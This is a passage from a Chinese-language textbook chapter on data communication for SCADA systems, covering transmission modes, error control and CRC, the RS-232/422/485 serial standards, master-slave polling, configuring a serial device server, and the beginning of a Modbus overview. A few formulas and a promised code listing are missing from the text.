数据通信系统是由数据信息的发送设备、接收设备、传输介质、传输报文、通信协议等组成。图2.1所示为香农定义的广义通信系统模型。其中信源为待传输数据信息的产生者。发送器将信息变换为适合于信道上传输的信号,而信宿的作用与之相反。信道指发送器与接收器之间用于传输信号的物理介质,又称传输介质。经过传输,在接收器处收到的信号在接收器处变为信息。通信传输过程会受到噪声的干扰,而噪声往往会影响接收者正确地接收和理解所收到的信息。为了把接收到的信息还原为原有信息,并为接收者所理解,需要一套实现约定的协议。协议是数据通信规则的集合,如果没有协议,两台设备即使连接也无法通信。 发送设备、接收设备和传输介质是通信系统的硬件。发送设备用于匹配信息源和传输介质,即将信息源产生的数据经过编码变换为信号形式,送往传输介质;接收设备则需要完成发送设备的反变换,即从带有干扰的信号中正确恢复出原有信号,并进行解码、解密等操作。 SCADA系统中,由于越来越多的设备变得智能化和数字化,数字通信能力越来越强大,因此,依赖不同时刻设备的作用,许多设备既是发送设备也是接收设备。如下位机设备与上位机通信时,当下位机向上位机传送现场仪表参数时,下位机是发送设备,上位机是接收设备;而当下位机接收上位机的控制指令,如开启某台设备,或修改下位机参数时,下位机是接收设备,而上位机是发送设备。 传输信道可以是简单的两条导线,也可以是由传输介质、数据中继、交换、存储、管理设备构成的网络。传输信道是为收发两地的数据流提供传输的信道,传输信道由两部分组成:一部分是传输介质,另一部分是其他数据处理设备。传输介质分为有线介质和无线介质两种,有线介质有双绞线、同轴电缆和光纤等,无线介质则为空气。传输手段为微波、红外线、激光等,由光纤、同轴电缆、双绞线等有线介质构成有线线路,而由微波接力或卫星中继等方式通过大气层传输则构成无线通信。有线通信具有性能稳定,受外界干扰少,维护方便,保密性强等优点,但其敷设工程量大,一次性投资也大。而无线通信利用无线电磁波在空气中传输信号,无需敷设有形介质,一次性投资相对较少,通信建立较灵活,但受空气环境影响较大,保密性较差。 2.2.2 数据传输的几个基本概念 1.数据传输模式 1)传输模式 数据传输模式是指数据在信道上传输所采取的方式。在计算机内部各个部件之间,计算机与各种外部设备之间,计算机与计算机之间,计算机与智能控制设备之间,智能控制设备与智能控制设备之间,都以通信的方式传递交换数据信息。数据传输模式可以分为不同的类型,如果按数据代码传输的顺序,可以分为两种基本方式:即并行传输与串行传输;按数据传输的同步方式,可以分为同步传输与异步传输;按数据传输的流向和时间关系,可以分为单工、半双工与全双工数据传输;按照数据信号特点,可以分为基带传输、频带传输和数字数据传输。 2)同步技术 在数据通信系统中,通信系统的接收设备与发送设备的数据序列在时间上必须取得同步,以准确地接收发来的每位数据。在通信过程中收发两端工作的协调一致性是实现信息传输的关键,要求接收设备按照发送设备所发送的每个码元的重复频率及起止时间来接收数据,而且接收时还要不断校准时间和频率,这一过程称为同步过程。在数据通信系统中主要有载波同步、位(码元)同步和群(码组、帧)同步。 载波同步、位同步是数据通信系统接收数据码元的需要。位同步是使接收端对每一位数据都要和发送端保持同步,可分为外同步法和自同步法。最典型的自同步法就是曼彻斯特编码。另外,在数据传输系统中为了有效地传递数据报文,通常还要对传输的信息分成若干组或打包,这样接收端要准确地恢复这些数据报文,就需要组同步、帧同步或信息包同步,这类同步称为群同步。 对数据通信系统来说,最基本的同步是收发两端的时钟同步,这是所有同步的基础。为了保证数据准确地传递,要求系统定时信号满足以下两点: (1)接收端的定时信号频率与发送端定时信号频率相同。 (2)定时信号与数据信号间保持固定的相位关系。 3)基带传输、频带传输和数字数据传输 基带传输是指原始信号不经调制,直接在信道上传输,即直接将计算机(或终端)输出的二进制“1”或“0”的电压(或电流)基带信号送到电路进行传输。基带传输比较简单,广泛用于短距离的数据传输,传输电路为双绞线、对称电缆等。目前大部分计算机局域网都采用基带传输。SCADA系统中,上位机系统、下位机之间及下位机与智能设备之间多采用基带传输。 频带传输指把代表二进制“1”或“0”的信号,通过调制解调器变换成具有一定频带范围的模拟信号进行传输。到达接收端后,再把接收信号解调成原来的数字信号。数字调制技术可分为两种类型:一种是利用模拟的方法去实现数字调制,即将数字信号视为特殊的模拟信号来处理;另一种是利用数字信号的离散和有限取值的特点,用基带脉冲对载波波形的某些参量进行控制,使这些参量随基带脉冲变化,从而达到调制的目的。由于大多数的数字数据通信系统都采用正弦波信号作为载波,而正弦信号只有振幅、频率和相位3个关键参数。因此,正弦波数字信号调制就有3种基本方法:幅键控法(ASK)、频移键控法(FSK)、相移键控法(PSK)。频带传输可分为窄带传输(只传输一路信号)和宽带传输(同时传输多路信号)。SCADA系统中,上、下位机之间的通信多采用频带传输。频带传输可以实现多路复用,提高了传输信道的利用率。 数字数据传输是利用数字话路传输数据信号的一种方式,这种方式效率高,传输质量较好。 4)通信线路工作方式 单工通信是指通信只在一个方向上进行,在发送方和接收方之间有明确的方向性。如计算机向显示器传输数据就是采用单工方式。 半双工通信指通信可以在两个方向上进行,但不能同时进行传输,必须轮流进行。 全双工通信指通信可以在两个方向上同时进行。当设备在一条线路上发送数据时,它也可以接收到其他数据。全双工通信时,收发两端都要安装调制解调器。 2. 数字数据传输 在线路上传输的二进制数据可以采用并行模式传输或串行模式传输。在并行模式下,每一个时钟脉冲有多位数据被传送;而在串行模式下,每一个时钟脉冲只发送一位数据。而且,发送并行数据仅仅只有一种方式,而对于串行传输则有两种方式—同步传输和异步传输。 1)并行传输 并行传输(Parallel Transmission)是将由“1”和“0”组成的二进制数,n位组成一组,在发送时n位同时发送,即数据以成组的方式在两条以上的并行信道上同时传输。传输过程中,使用n根线路同时发送n位,每一位都有自己独立的线路,并且一组中的所有n位都能够在同一个时钟脉冲从一个设备传送到另一个设备上。例如,采用8条导线并行传输一个字节的8个数据位,另外用一条“选通”线通知接收者接收该字节,接收方可对并行通道上各条导线的数据位信号并行取样。最常见的并行传输的例子是计算机和外围设备之间的通信,CPU、存储器和设备控制器之间的通信。虽然并行传输具有速度快的优点,但由于其通信成本较高,不适合长距离的数据传输。 2)串行传输 串行传输(Serial Transmission)是使数据流以串行方式在一条信道一位接一位地传输。串行传输仅需要一根通信线路就可以在两个通信设备之间进行数据传输,方法简单,易于实现,而且成本较低。通常情况下,采用串行传输的线路,在设备内部都采用并行通信方式,这就需要在发送方和通信线路之间以及通信线路和接收方之间的接口进行转换。串行传输的缺点是需外加同步措施,同时每次只能传输一位数据,所以速度较慢。 在串行传输时,接收端为从串行数据码流中正确地划分出发送的一个个字符所采取的措施,称为字符同步。根据实现字符同步方式的不同,串行数据传输分为异步传输和同步传输。 虽然串行通信传输速度慢,但它抗干扰能力强,传输距离远,因此许多监控设备一般都配置有串行通信接口,在SCADA系统中也广泛使用串行通信方式进行监控与数据采集。 3. 同步传输与异步传输 同步传输是以一定时钟节拍来发送数据信号的。这个时钟可以是由参与通信的那些设备或器件中的一台产生的,也可以是由外部时钟信号源提供的。时钟可以有固定的频率,也可以间隔一个不规则的周期进行转换。所有传输的数据位都和这个时钟信号同步。在同步传输时,它不是独立地发送每个字符,而是连续地发送位流,并且不需要每个字符都有自己的开始位和停止位,而是把它们组合起来一起发送,这些组合称为数据帧,或者简称为帧。 异步传输中,每个节点有有自己的时钟信号,每个通信节点必须在时钟频率上保持一致,并且所有的时钟必须在一定误差范围内相吻合。异步传输中,并不要求在传送信号的每一数据位时收发两端都同步。例如在单个字符的异步方式中,在传输字符前设置一个启动用的起始位,预告字符信息代码即将开始;在信息代码和校验信号结束后,也设置一个或多个停止位,表示该字符已结束。在起始位和停止位之间,形成一个需要传送的字符。起始位对该字符内的各数据位起同步作用。 同步传输通常要比异步传输快,传输效率较高。异步传输实现起来比较容易,对线路和收发器要求较低,实现字符同步也比较简单,收发双方的时钟信号不需要精确地同步。缺点是多传输了用于同步目的的字符,降低了传输效率。 2.2.3 差错控制 在数据通信过程中,由于各种干扰及传输线路本身的因素,在传输过程中会不可避免地发生错误,特别是随着无线通信应用的增多,因为无线通信差错率要远高于有线通信。因此,为了提高通信系统的传输质量而采取的检测与校正方法就是差错控制。在计算机网络中,差错控制通常是在数据链路层进行的。通过差错控制,可以减少通信过程中的传输错误。差错检查是让报文分组中包含使接收端发现差错的冗余信息,但它不能确定是哪一位出错,也不能纠正传输中的差错;而差错纠正是让报文中每个传输的报文分组中带有足够的冗余信息,使得接收端能发现并自动纠正传输错误。差错纠正在功能上优于差错检测,但实现复杂,造价高。差错检测原理简单,容易实现,编码与解码速度快,应用广泛。 1. 差错控制的工作方式 差错控制的工作方式有两类:一类是接收端检测到接收的数据有差错时,接收端自动纠正差错;另一类是接收端检测出错误后不是自动纠错,而是反馈给发送端一个表示错误的应答信号,要求重发,直到正确接收为止。目前常用的差错控制方式有以下3种。 1)反馈纠错 反馈纠错指发送端发送的码字具有检错能力,接收端根据协议对所接收的码字检测是否有错误,然后通过反馈信道把判决结果反馈给发送端,要求发送端重传出错信息,直到正确接收为止。这种方法的优点是:检错码简单,易于实现,冗余编码少,可以适应多种不同的信道,特别是对突发差错更为有效。 2)前向纠错 前向纠错指发送端将信息码元按照一定规则加上监督信息,构成纠错码,纠错码的纠错能力有限。当接收的码字中有差错且在该码字的纠错能力之内时,接收端会自动纠错。与反馈纠错方式相比,前向纠错不需要反馈信道,可以进行单向通信,译码实时性好,控制电路简单;但所需的编译码设备复杂,冗余位多,编码效率低,当错误超过码字的纠错能力时无法纠错。 3)混合纠错 混合纠错是反馈纠错与前向纠错两种方式的结合。当接收端收到码字后首先判断有无差错,如果差错在编码的纠错能力之内,则自动纠错;如果超过编码的纠错能力,则通过反馈信道命令发送端重发以纠正错误,直到正确为止。 2. 常用的差错检测方法 差错检测就是监视收到的数据并判别是否发生了传输错误。差错检测仅仅识别出错现象而不识别错误在哪个或哪几位。差错检测常用的方法有以下两种。 1)奇偶校验码 奇偶校验码是一种最简单实用的检错码,指通过增加冗余位来使得码字某些位中“1”的个数保持为偶数或奇数的编码方式。异步通信系统中使用偶校验或奇校验这两种方法。在奇偶校验中,一个单独的位(奇偶校验位)被加在每个字符上,以使一个字符中“1”的总数要么是奇数(奇校验),要么是偶数(偶校验)。奇偶校验可能漏掉大量的错误,但是应用起来很简单。 2)循环码(Cyclic Redundancy Check,CRC) 纠错码虽然能纠正数据的错误,但是纠错码的冗余位比检错码多得多,也就是说,它的编码效率比检错码低得多,会使网络传输效率降低。而CRC码是一种检错率高、编码效率高的检错码。 CRC码的原理是,任何一个由二进制数位串成的代码,都可以和一个只有“1”和“0”为系数的多项式建立一一对应关系。例如,如果要发送的信息M(x)的二进制代码为1110101,则 。 由此可见,k位要发送的信息位,可对应于一个k-1次多项式。如果传送的码字总长为n,则n=k+r,r是冗余位的位数。在数据传输过程中,某一个生成多项式G(x),当G(x) 为n位时,其冗余位最多为n-1位,对应一个n-1次多项式R(x)。在校验时,发送方和接收方根据 的原理,在发送方将M(x)与R(x)一起发送,则接收端满足 ,所以接收端只要满足余数为零即可。 假设接收方收到的数据位串是100100001,其生成的多项式所对应的位串是1101,接收方进行如下校验:用100100001除以1101,余数为0,说明该数据传输正确,若余数不为0,则表示传输有差错。所以接收端的校验过程就是用G(x)来除接收到的码字多项式的过程。 CRC校验码检错能力很强,它除了能检查出离散错外,还能检查出突发错。其检错能力如下: (1)能检查出全部单个错。 (2)能检查出全部离散的二位错。 (3)能检查出全部奇数个数。 (4)能检查出全部长度小于或等于k位的突发错。 (5)能以 的概率检查出长度为k+1位的突发错。 2.3 通用串行通信 几乎所有的仪表、控制设备都配置有串行接口。在SCADA系统中,串行通信广泛存在于许多现场控制设备与上位机之间,因此,了解串行通信是十分必要的。 串行接口通信接口中有两个重要的概念,即数据终端设备DTE(Data Terminal Equipment,DTE)和数据电路终接设备DCE(Data Circuit-terminating Equipment,DCE)目前最常用的有关DTE和DCE之间的接口标准是EIA和ITU-T制定的标准。其中EIA(美国电子工业协会,Electrical Industrial Association,EIA)标准有EIA-232、EIA-442和EIA-449等;ITU-T标准称为V系列和X系列。数据通信接口标准主要用来定义数据通信的接口和信号方式,在通信线路的两端都要有DTE和DCE,如图2.2所示。DTE产生数据并且传输到DCE,而DCE将此信号转换成适当的形式在传输线路上进行传输。在物理层,DTE可以是终端、微机、打印机、传真机等其他设备,但是一定要有一个转接设备才可以通信。DCE是指可以通过网络传输或接收模拟数据或数字数据的任意一个设备,最常用的设备就是调制解调器。 2.3.1 串行通信参数 串行通信中,交换数据的双方利用传输在线路上的电压变化来达到数据交换的目的,但是如何从不断改变的电压状态中解析出其中的信息,就需要双方共同决定才行,即需要说明通信双方是如何发送数据和命令的。因此,双方为了进行通信,必须要遵守一定的通信规则,这个通信的规则就体现在对通信端口的初始化的参数上。利用通信端口的初始化实现对以下4项的设置。 1)数据的传输速度 RS-232常用于异步通信,通信双方没有可供参考的同步时钟作为基准,此时双方发送的高低电平到底代表几个位就不得而知了。要使双方的数据读取正常,就要考虑到传输速率—波特率(Baud Rate),其代表的意义是每秒所能产生的最大电压状态改变率。由于原始信号经过不同的波特率取样后,所得的结果完全不一样,因此通信双方采用相同的通信速度非常重要。如在仪器仪表中,常选用的传输速度是9.6Kbps。 2)数据的发送单位 一般串行通信端口所发送的数据是字符型的,这时一般采用ASCII码或JIS(日本工业标准)码。ASCII码中8个位形成一个字符,而JIS码则以7个位形成一个字符。若用来传输文件,则会使用二进制的数据类型。欧美的设备多使用8个位的数据组,而日本的设备则使用7个位作为一个数据组。 3)起始位及停止位 由于异步串行传输中没有使用同步时钟脉冲作为基准,故接收端完全不知道发送端何时将进行数据的发送。为了解决这个问题,就在发送端要开始发送数据时,将传输在线路的电压由低电位提升至高电位(逻辑0),而当发送结束后,再将高电位降至低电位(逻辑1)。接收端会因起始位的触发而开始接收数据,并因停止位的通知而确知数据的字符信号已经结束。起始位固定为1个位,而停止位则有1、1.5及2个位等多种选择。 4)校验位的检查 为了预防错误的产生,使用了校验位作为检查的机制。校验位是用来检查所发送数据正确性的一种校验码,又分为奇校验(Odd Parity)和偶校验(Even Parity),分别检查字符码中“1”的数目是奇数个还是偶数个。在串行通信中,可根据实际需要选择奇校验、偶校验或无校验。 2.3.2 流量控制 在串行通信中,当数据要由A设备发送到B设备前,数据会先被送到A设备的数据输出缓冲区,接着再由此缓冲区将数据由线路发送到B设备;同样,当数据利用硬件线路发送到B设备时,数据会先发送到B设备的接受缓冲区,而B设备的处理器再到接收缓冲区将数据读取并进行处理。 所谓的流量控制,是为了保证传输双方都能正确地发送和接收数据而不会漏失。如果发送的速度大于接收的速度,而接收端的处理器来不及处理,则接收缓冲区在一定时间后会溢出,造成以后发送来的数据无法进入缓冲区而漏失。解决这个问题的方法是让接收方通知发送端何时发送以及何时停止发送。流量控制又称为握手(Hand Shaking),常用的方式有:硬件握手和软件握手两种。 以RS-232来说,硬件握手使用DSR、CTS、DTR和RTS四条硬件线路。其中DTR和RTS指的是计算机上的RS-232端;而DSR和CTS则是指带有RS-232接口的智能设备。通过4条线的交互作用,计算机主控端与被控的设备端可以进行数据的交流,而在数据传输太快而无法处理时,可以通过这4条握手线的高低电位的变化来控制数据是继续发送还是暂停发送。图2.3描述了计算机向设备传输数据时的硬件流量控制。 软件握手采用数据线上的数据信号来代替实际的硬件线路。软件握手中常用的就是XON/XOFF协议。在XON/XOFF协议中,若接收端想使发送端暂停数据的发送时,它便向发送端送出一个ASCII码13H;而若恢复发送时,便向发送端送出ASCII码11H,两个字符的交互使用,便可控制发送端的发送操作,其操作流程与硬件握手类似。 2.3.3 RS-232C接口特性与串行通信 1.RS-232C接口特性 以EIA-232为例,主要介绍RS-232C接口标准。该标准是EIA于1973年提出的串行通信接口标准,主要用于模拟信道传输数字信号的场合。RS(Recommeded Standard)代表推荐标准,232是标识号,C代表RS-232的最新一次修改,在这之前有RS-232B、RS-232A。RS-232C是用于数字终端设备DTE与数字电路终端设备DCE之间的接口标准。RS-232C接口标准所定义的内容属于国际标准化组织ISO所制定的开放式系统互连参考模型中的最低层—物理层所定义的内容。RS-232C接口规范的内容包括连接电缆和机械特性、电气特性、功能特性和规程特性4个方面。 1)机械特性 RS-232C接口规范并没有对机械接口做出严格规定。RS-232C的机械接口一般有9针、15针和25针3种类型。标准的RS-232C接口使用25针的DB连接器(插头、插座)。RS-232C在DTE设备上用作接口时一般采用DB25M插头(针式)结构;而在DCE(如Modem)设备上用作接口时采用DB25F插座(孔式)结构。特别要注意的是,在针式结构和孔式结构的插头插座中引脚号的排列顺序(顶视)是不同的,使用时要务必小心。 2)电气特性 DTE/DCE接口标准的电气特性主要规定了发送端驱动器与接收端驱动器的信号电平、负载容限、传输速率及传输距离。RS-232C接口使用负逻辑,即逻辑“1”用负电平(范围为-5~-15V)表示,逻辑“0”用正电平(范围为+5~+15V)表示,-3~+3V为过渡区,逻辑状态不确定(实际上这一区域电平在应用中是禁止使用的),如图2.4所示。RS-232C的噪声容限是2V。RS-232C的主要电气特性如表2.1所示。 3)功能特性 RS-232C接口连线的功能特性,主要是对接口各引脚的功能和连接关系做出定义。RS-232C接口规定了21条信号线和25芯的连接器,其中最常用的是引脚号为1~8、20这9条信号线。实际上RS-232C的25条引线中有许多是很少使用的,在计算机与终端通信中一般只使用3~9条引线。RS-232C最常用的9条引线的信号内容见表2.2。RS-232C接口在不同的应用场合所用到的信号线是不同的。例如,在异步传输时,不需要定时信号线;在非交换应用中则不需要某些控制信号;在不使用备用信道操作时,则可省去5个反向信号线。 表2.2 串行通信接口电路的名称和方向 4)规程特性 规程特性是指数据终端设备与数据通信设备之间控制信号与数据信号的发送时序、应答关系及操作过程。该标准规定按照以下规则和时序进行,即首先建立物理连接,然后进行数据传输,最后释放物理连接。 2.RS-232C串行通信 RS-232C被定义为一种在低速率串行通信中增加通信距离的单端标准。RS-232C采取不平衡传输方式,即所谓单端通信。收、发端的数据信号是相对于信号的,如从DTE设备发出的数据在使用DB25连接器时是2脚相对7脚(信号地)的电平。典型的RS-232C信号在正负电平之间摆动,在发送数据时,发送端驱动器输出正电平在+5~+15V,负电平在-15~-5V。当无数据传输时,线上为TTL,从开始传送数据到结束,线上电平从TTL电平到RS-232C电平再返回TTL电平。接收器典型的工作电平在+3~+12V与-12~-3V。由于发送电平与接收电平的差仅为2~3V,所以其共模抑制能力差,再加上双绞线上的分布电容,其传送距离最大为约15m,最高速率为20Kbps。RS-232C是为点对点(即只用一对收发设备)通信而设计的,其驱动器负载为3~7kΩ。所以RS-232适合本地设备之间的通信。 2.3.4 RS-422与RS-485串行接口 1.RS-422串行接口 RS-422由RS-232发展而来,它是为弥补RS-232之不足而提出的。为改进RS-232通信距离短、速率低的缺点,RS-422定义了一种平衡通信接口,将传输速率提高到10Mbps,传输距离延长到4000英尺(速率低于100Kbps时),并允许在一条平衡总线上连接最多10个接收器。RS-422是一种单机发送、多机接收的单向、平衡传输规范,被命名为TIA/EIA-422-A标准。RS-422标准全称是“平衡电压数字接口电路的电气特性”,它定义了接口电路的特性。典型的RS-422有四线接口,连同一根信号地线,共5根线。由于接收器所采用的高输入阻抗和发送驱动器要比RS-232的驱动能力更强,故允许在相同传输线上连接多个接收节点,最多可接10个节点。即一个主设备(Master),其余为从设备(Salver),从设备之间不能通信,所以RS-422支持点对多的双向通信。RS-422四线接口由于采用单独的发送和接收通道,因此不必控制数据方向,各装置之间任何必须的信号交换均可以按软件方式(XON/XOFF握手)或硬件方式(一对单独的双绞线)实现。RS-422的最大传输距离为4000英尺(约1219m),最大传输速率为10Mbps。其平衡双绞线的长度与传输速率成反比,在100Kbps速率以下,才可能达到最大传输距离。只有在很短的距离下才能获得最高速率传输。一般100m长的双绞线上所能获得的最大传输速率仅为1Mbps。 2.RS-485串行接口 为扩展RS-422串行通信应用范围,EIA又于1983年在RS-422基础上制定了RS-485标准,增加了多点、双向通信能力,即允许多个发送器连接到同一条总线上,同时增加了发送器的驱动能力和冲突保护特性,扩展了总线共模范围,后命名为TIA/EIA-485-A标准。由于RS-485是从RS-422基础上发展而来的,所以RS-485许多电气规定与RS-422相仿,如都采用平衡传输方式、都需要在传输线上接终端电阻等。RS-485可以采用二线与四线方式,二线制可实现真正的多点双向通信。而采用四线连接时,与RS-422一样只能实现点对多的通信,即只能有一个主(Master)设备,其余为从设备,但它比RS-422有所改进,无论四线还是二线连接方式,总线上可连接的设备最多不超过32个。RS-485与RS-422的不同还在于其共模输出电压,RS-485是-7~+12V之间,而RS-422在-7~+7V之间。RS-485与RS-422一样,其最大传输距离为4000英尺(约1219m),最大传输速率为10Mbps。平衡双绞线的长度与传输速率成反比,在100Kbps速率以下,才可能使用规定最长的电缆长度。 为了提高RS-485总线通信距离,可以采用增加中继的方法对信号进行放大,最多可以加八个中继,也就是说理论上RS-485的最大传输距离可以达到9.6km。如果需要更长距离传输,可以采用光纤为传播介质,在收发两端各加一个光电转换器,多模光纤的传输距离是5~10km,而采用单模光纤可达50km的传播距离。 RS-485总线电缆在一般场合采用普通的双绞线就可以,在要求比较高的环境下可以采用带屏蔽层的同轴电缆。RS-485需要2个终端电阻,其阻值要求等于传输电缆的特性阻抗。在短距离传输时可不需终端电阻,即一般在300m以下不需终端电阻,终端电阻接在传输总线的两端。 由于RS-232、RS-422与RS-485等串行接口标准不涉及通信协议,用户可以在此基础上建立自己的高层通信协议。 2.3.5 RS-485网络的主从式通信 1.主从式协议 主从协议是RS-485网络中常用的通信协议。网段中的一个节点被指定为主节点,其他节点为从节点,由主节点负责控制该网段上的所有通信连接。为保证每个节点都有机会传送数据,主节点通常对从节点依次逐一轮询,形成严格的周期性报文传输。主节点不停地传送报文给从节点,并等待相应从节点的应答报文。 从节点如果收到了一个正确无误的报文,而且报文中的地址与自己的节点地址相同,则需要应答,才能得到报文发送的机会。如果主节点在规定的时间内收到了应答报文,就表明主从节点之间已经建立了连接,可以进行数据传输,由一个主节点对RS-485总线的占用进行管理,任一时刻只允许一个节点向总线发送报文。从节点只有得到主节点许可才可以发送报文,从节点与从节点之间不能直接通信。 许多RS-485总线网络采用主从协议管理网络的控制权。由一个主节点对总线的占用进行管理,任一时刻都只允许一个节点向总线发送报文。RS-485总线上所有从节点只有在得到主节点许可时才能有报文发送的机会。采用主从式协议时从节点之间不能直接通信。 2.通用串行协议 通用串行协议(Universal Serial Protocol)是一种工业控制网络协议,它采用串行通信和主从式介质访问控制方式,实现自控设备间通信。其总线操作过程与PROFIBUS现场总线基本相同。通用串行协议有以下主要特点: · 采用EIA-485接口,支持多点通信连接,一个网段最多能连接32个节点。 · 采用主从访问技术,构成单主控制网络。 · 报文结构简单、可靠。报文长度可变,也可固定,配置灵活。 · 通信速率可根据实际情况选择9.6Kbps、19.2Kbps、38.4Kbps、93.75Kbps及187.5Kbps。 通用串行协议既可以像其他主从协议那样,由主节点对从节点的轮询组成周期性的报文通信。从节点只有对主节点的轮询做出应答后,才能得到发送报文的机会。通用串行协议一般利用周期性的报文通信传递I/O数据。而服务和诊断等功能一般采用非周期报文的传输来实现。在通用串行协议中规定,对非周期性的报文传输不需要从节点应答。 通用串行协议还支持广播式通信。在广播模式下,主节点给总线上所有从节点发送报文,报文地址域的字段无效,从节点无需对收到的广播报文发应答信息。 通用串行协议的报文由五个部分组成,分别是起始标志、报文长度、地址域、数据域和校验。起始标志字节的值固定为02H,报文长度不包括开始字节和报文长度字节,能表达的报文最大长度为255字节。 地址域指明从节点的地址值和报文类型,地址字节的低五位表示从站地址,地址字节的高三位表示报文类型。数据域分为参数区和过程输入区,其长度随控制任务的变化而变化。参数区用来定义控制通信双方传送的机制、参数定义以及与参数相关的内容。过程数据区是对从节点读写的参数值。校验字节是通信报文的校验和。 3.应用案例分析 1)应用背景与系统组成 一氧化碳中-低温变换反应中测量和控制的参数有:脱氧槽温度、饱和器温度、恒温槽与反应器间管道温度、中变反应器温度、低变反应器温度、中变和低变反应器中间管道温度、配气流量、中变后引出分析的气体流量、系统内部与外部差压、中变和低变后的二氧化碳气体含量(进而可对其他组分进行物料衡算)。由于系统需要较多的温度控制,且设备又分散,具备分散控制的特点,为此采用两级分布式测控结构,系统硬件结构如图2.5所示。现场总线选用RS-485总线,直接将智能仪表挂接在RS-485总线上,通过RS-232/485转接器与PC串口连接。系统配置了6台智能仪表(宇电AI-808),RS-232/485转换器一块,并为每个节点设备分配一个唯一的地址。温度控制由智能仪表完成,而上位机只对下位机实现远程监控功能,一方面接收现场智能仪表传送来的温度等采集数据,另一方面对现场智能仪表的温度控制设定值和其他参数进行更改。数据的上传下达通过RS-485总线并在通信软件的控制下完成。 2)通信程序设计 通信主要是上位机与AI-808系列现场智能仪表的通信,采用主从通信方式,上位机为主节点,其他智能仪表为从节点,从节点的地址是从1~6。宇电AI仪表采用16进制数据格式来表示各种指令代码及数据,仪表指令有读指令和写指令,仅用两条指令能够实现对仪表的所有操作。其读/写指令的格式为: 读指令:仪表地址代码+52H+要读的参数代号+0+0+CRC校验码。 写指令:仪表地址代码+43H+要写的参数代号+写入数低字节+写入数高字节+CRC校验码。 其中仪表地址代码的基数为80H。要读/写的参数种类共有26个,具体包括给定值、上/下限报警、控制方式、小数点位置等,每个参数都有一个代号。无论是读还是写,仪表都返回以下数据: 测量值+给定值+输出值及报警状态+所读/写参数值+CRC校验码 测控软件采用Visual Basic开发。对AI仪表的串口通信采用了MsComm控件,并以查询方式读端口数据。对AI仪表的通信参数设置可选择为:波特率9.6Kbps、无奇偶效验、8个数据位、2个停止位。串行通信程序代码如下: 2.3.6 串口服务器 1.串口服务器工作原理 串行通信接口是大量的自动化仪表和控制装置的基本通信接口,在自动化领域仍然广泛使用。然而,计算机的串口数量有限,虽然可以采用串口扩展卡来增加PC的串口数量,但它要占用主机资源,并可能导致系统不稳定,同时连接的终端数目和距离有限。随着企业信息化的要求不断提高以及远程监控的需要,将这些串口设备与信息网络连接也变得十分迫切。为了解决众多串行通信设备的联网问题,许多控制设备与通信设备厂家生产了一类串口设备联网产品—串口服务器。通过串口服务器设备制造厂家自带的软件,可以把计算机之外的接口虚拟到计算机上,成为计算机的一个串口,应用程序可以像使用计算机上自带的串口一样用使用这些虚拟出来的串口。串口服务器通常带有1个10/100M网络接口和1个或多个异步RS-232/485串行接口。串口服务器内部通常使用高性能的32位ARM处理器,支持多种网络协议,且体积较小、功能齐全,是一种将串行数据和在以太网传送的TCP/IP数据包之间进行相互转换的桥梁,使带有传统的异步串行数据设备的信息可以通过互联网络进行传送或共享。串口服务器不占用主机资源,且具有终端服务器的功能,可将现有的传统的串口设备立即转换成具备网络接口的外设,保障用户原有硬件和软件的投资而不影响设备的任何性能。 2.串口服务器的应用方式 图2.6所示为典型的基于RS-485总线的主从式监控系统结构,在这种方式中,RS-232/ 485转换器与计算机的距离很短,这制约了这种结构的系统应用范围。利用串口服务器,将图2.6所示的系统结构改造成图2.7(a)所示。在图2.7(a)所示的系统中,计算机与串口服务器是通过以太网连接的,因此,它们之间的距离可以很长,实现了串口设备联网的目的,而串口服务器的RS-485总线上挂接串口设备。然而,由于RS-485总线距离最大是1200m,因而采用这种方法时串口设备之间距离以及串口设备与串口服务器之间的距离受总线距离的限制。为此,可以把图2.7(a)所示的系统结构改成图2.7(b)所示。这里,对于每个串口设备都配置一个串口服务器,将串口设备与串口服务器的串行接口连接,而串口服务器的以太网口通过交换机与计算机连接。不过,在这种方式中,每个串口服务器都需要一个单独的IP地址。 3.串口服务器的配置与使用实例 以泓格科技的I-7188E3串口服务器产品为例,介绍串口服务器的使用。该产品有3个串行端口,分别是2个RS-232和1个RS-485口,1个支持10Base-T标准以太网接口。串口支持泓格的“Self Tuner”自适应技术,可以自动切换RS-485网络中的波特率及数据格式,这样可以在单一的RS-485网络中连接波特率及数据格式都不相同的串行设备,如PLC、RS-485设备、RS-232设备及PC等。 在安装虚拟串口服务器驱动程序前,用厂商提供的工具软件配置与检查串口服务器的设置,如IP地址等。 串口服务器的安装过程如下,首先启动VxComm Utility,出现如图2.8所示的窗口。在该窗口中,设置I-7188E3的IP地址。CMP与Timeout可以使用默认值。 然后单击“Add Server”,注意要取消“Check Server”前的选择。这时会弹出如图2.9所示的设备选择窗口,选择所使用的设备。这里选7188E3,然后单击“OK”按钮退出。这时VxComm Utility窗口显示如图2.10所示。 为了确认计算机与串口服务器连接是正确的,可以选择菜单“TOOLS→DEVICE INFORMATION”,会弹出如图2.11所示的窗口,若连接正确,会显示“Status:OK”,并且还会显示串口服务器的设备信息以及网络信息。若连接不正确,将不会显示以上信息,此时,要进行软、硬件的检查,消除错误。 接下来就要把I-7188E3不同的端口(Port)映射到计算机的串口上。单击图2.10窗口右面第一行的Port,会弹出如图2.12所示的端口设置窗口。首先选中“Assign following COM number sequentially”。然后在“Select COM”中选择串口,注意这里显示的COM从COM1到COM255。应该选择计算机上没有使用的串口,如选COM10。设置完成,单击“OK”按钮退出。这时,VxComm Utility窗口内容如图2.13所示。可以看到,I-7188E3的端口已经按照顺序被映射到计算机上的串口。假设Port2是连接了一台RS-485设备,在启动了虚拟串口服务器后,计算机上的应用软件可以通过COM12与该设备通信。写程序时,和常规的读/写串口一样。 还可以从工具菜单来查看虚拟串口服务器的信息,如图2.14所示。 为了检验串口服务器工作是否正常,还可以用泓格科技提供的调试软件SendTCP来调试虚拟串口服务器,如图2.15所示。该工具一方面可以与7188控制器通信,对该控制器进行参数设置和读取相关的信息,此时在“Send Command To 7188E”下面的文本框输入命令。也可以控制与该控制器串口连接的7K和8K系列I/O模块,此时要根据不同的串口选择端口(Select Port)。命令后要加“回车”(Send Data with CR),因为不同的命令其长度不同,为了让I/O设备知道命令的结束,所以要加回车。在测试前,一定要首先设置好控制器的IP地址,然后单击“Connect”。连接成功后,在窗口的右面会显示网络状态和7188E的信息,如COM口设置和MiniOs的信息等。也可以在这里修改控制器网络参数。 2.4 Modbus通信协议 2.4.1 Modbus 协议概述 1. Modbus协议 Modbus 协议是一种Modicon 公司开发的通信协议,最初目的是实现可编程控制器之间的通信。利用Modbus 通信协议,可编程控制器通过串行口或者调制解调器联入网络。该公司后来还推出Modbus 